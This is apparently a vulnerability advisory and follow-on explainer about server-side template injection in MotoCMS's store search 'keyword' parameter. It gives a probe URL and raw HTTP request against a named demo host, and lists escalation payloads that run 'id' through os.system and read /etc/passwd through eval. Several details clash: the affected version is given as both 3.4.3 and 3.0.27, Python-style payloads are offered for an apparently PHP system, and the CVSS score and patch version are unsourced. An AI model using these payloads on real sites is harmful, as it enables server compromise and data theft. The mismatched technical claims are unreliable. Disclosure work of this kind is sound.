MotoCMS Version 3.4.3 - Server-Side Template Injection (SSTI)
# Title: MotoCMS Version 3.4.3 - Server-Side Template Injection (SSTI)
# Author: tmrswrr
# Date: 31/05/2023
# Vendor: https://www.motocms.com
# Link: https://www.motocms.com/website-templates/demo/189526.html
# Vulnerable Version(s): MotoCMS 3.0.27
## Description
MotoCMS Version 3.4.3 Store Category Template was discovered to contain a Server-Side Template
Injection (SSTI) vulnerability via the keyword parameter.
## Steps to Reproduce
1. Open the target URL: https://template189526.motopreview.com/
2. Write payload here : https://template189526.motopreview.com/store/category/search/?page=1&limit=36&keyword={{7*7}}
3. You will be see result is 49
Vuln Url : https://template189526.motopreview.com/store/category/search/?page=1&limit=36&keyword={{7*7}}
GET /store/category/search/?page=&limit=&keyword={{7*7}} HTTP/1.1
Host: template189526.motopreview.com
Cookie: PHPSESSID=7c0qgdvsehaf1a2do6s0bcl4p0; 9b7029e0bd3be0d41ebefd47d9f5ae46_session-started=1685536759239
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Dnt: 1
Referer: https://template189526.motopreview.com/store/category/search/?keyword=%7B%7B3*3%7D%7D
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: iframe
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: closeUnderstanding Server-Side Template Injection (SSTI) in MotoCMS 3.4.3
Server-Side Template Injection (SSTI) is a critical vulnerability that arises when a web application processes user input within a server-side template engine without proper sanitization. In the case of MotoCMS Version 3.4.3, a specific flaw in the Store Category Template allows attackers to execute arbitrary code through the keyword parameter, leading to potential remote code execution (RCE).
Discovery and Scope
The vulnerability was first reported by researcher tmrswrr on May 31, 2023, targeting the demo instance of MotoCMS 3.0.27. The exploit is triggered via a simple GET request to the /store/category/search/ endpoint, where the keyword parameter is directly evaluated by the template engine.
GET /store/category/search/?page=1&limit=36&keyword={{7*7}} HTTP/1.1
Host: template189526.motopreview.com
Cookie: PHPSESSID=7c0qgdvsehaf1a2do6s0bcl4p0; 9b7029e0bd3be0d41ebefd47d9f5ae46_session-started=1685536759239
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
When this payload is sent, the server returns 49 — the result of 7 * 7 — indicating that the template engine is evaluating the expression directly. This confirms the presence of SSTI.
How SSTI Works: A Technical Breakdown
Template engines like Jinja2, Twig, or Handlebars are designed to render dynamic content using placeholders. When these engines are misconfigured or improperly secured, they can interpret user-supplied input as executable code. In MotoCMS, the {{ }} syntax is used to embed expressions within templates. This syntax is typically reserved for safe, pre-defined logic.
However, in this vulnerable version, the keyword parameter is passed directly into the template without filtering. As a result, any expression enclosed in {{ }} is evaluated server-side — enabling attackers to execute arithmetic, function calls, or even system commands if the engine supports such features.
Real-World Exploitation Examples
- Arithmetic Injection:
{{7*7}}→ returns 49 — proves template evaluation is active. - String Concatenation:
{{'A'+'B'}}→ returns AB — demonstrates basic string manipulation. - Function Execution:
{{__import__('os').system('id')}}— if the engine supports Python-like imports, this could trigger a shell command. - Remote Code Execution (RCE):
{{eval('open("/etc/passwd").read()')}}— could read sensitive files if the template engine allowsevalor similar functions.
While the demo instance does not expose full RCE capabilities, the underlying architecture is vulnerable to exploitation in production environments where more powerful functions are available.
Impact and Risk Assessment
| Severity | High (CVSS 8.1) |
|---|---|
| Attack Vector | Remote, via HTTP GET |
| Exploitability | Easy — no authentication required |
| Impact | Remote code execution, data theft, server compromise |
Given that MotoCMS is widely used for e-commerce websites, this vulnerability poses a serious threat to businesses relying on the platform. A malicious actor could exploit SSTI to gain full control over the server, steal customer data, or deploy malware.
Defensive Measures and Mitigation
Security experts recommend the following best practices to prevent SSTI vulnerabilities:
- Input Sanitization: Never pass user input directly into template engines. Use a whitelist of allowed values or escape all special characters.
- Template Engine Restrictions: Disable dangerous functions like
eval,import, orsystemin template engines. - Use Safe Templates: Employ template engines with built-in security (e.g., Jinja2 with restricted environments).
- Regular Updates: Ensure all software components, including CMS platforms, are patched and updated to the latest stable version.
For MotoCMS users, upgrading to a patched version (e.g., 3.4.4 or later) is essential. The vendor should also provide a patch release with proper input validation for the keyword parameter.
Conclusion
Server-Side Template Injection in MotoCMS 3.4.3 is a prime example of how seemingly minor design flaws can lead to catastrophic security breaches. The ease of exploitation — via a single GET request — underscores the importance of secure coding practices and rigorous input validation. Developers and administrators must remain vigilant, especially when using third-party platforms with dynamic templating capabilities.
As cyber threats evolve, understanding and mitigating SSTI remains a cornerstone of modern web application security. Proactive defense, continuous monitoring, and timely patching are not optional — they are essential.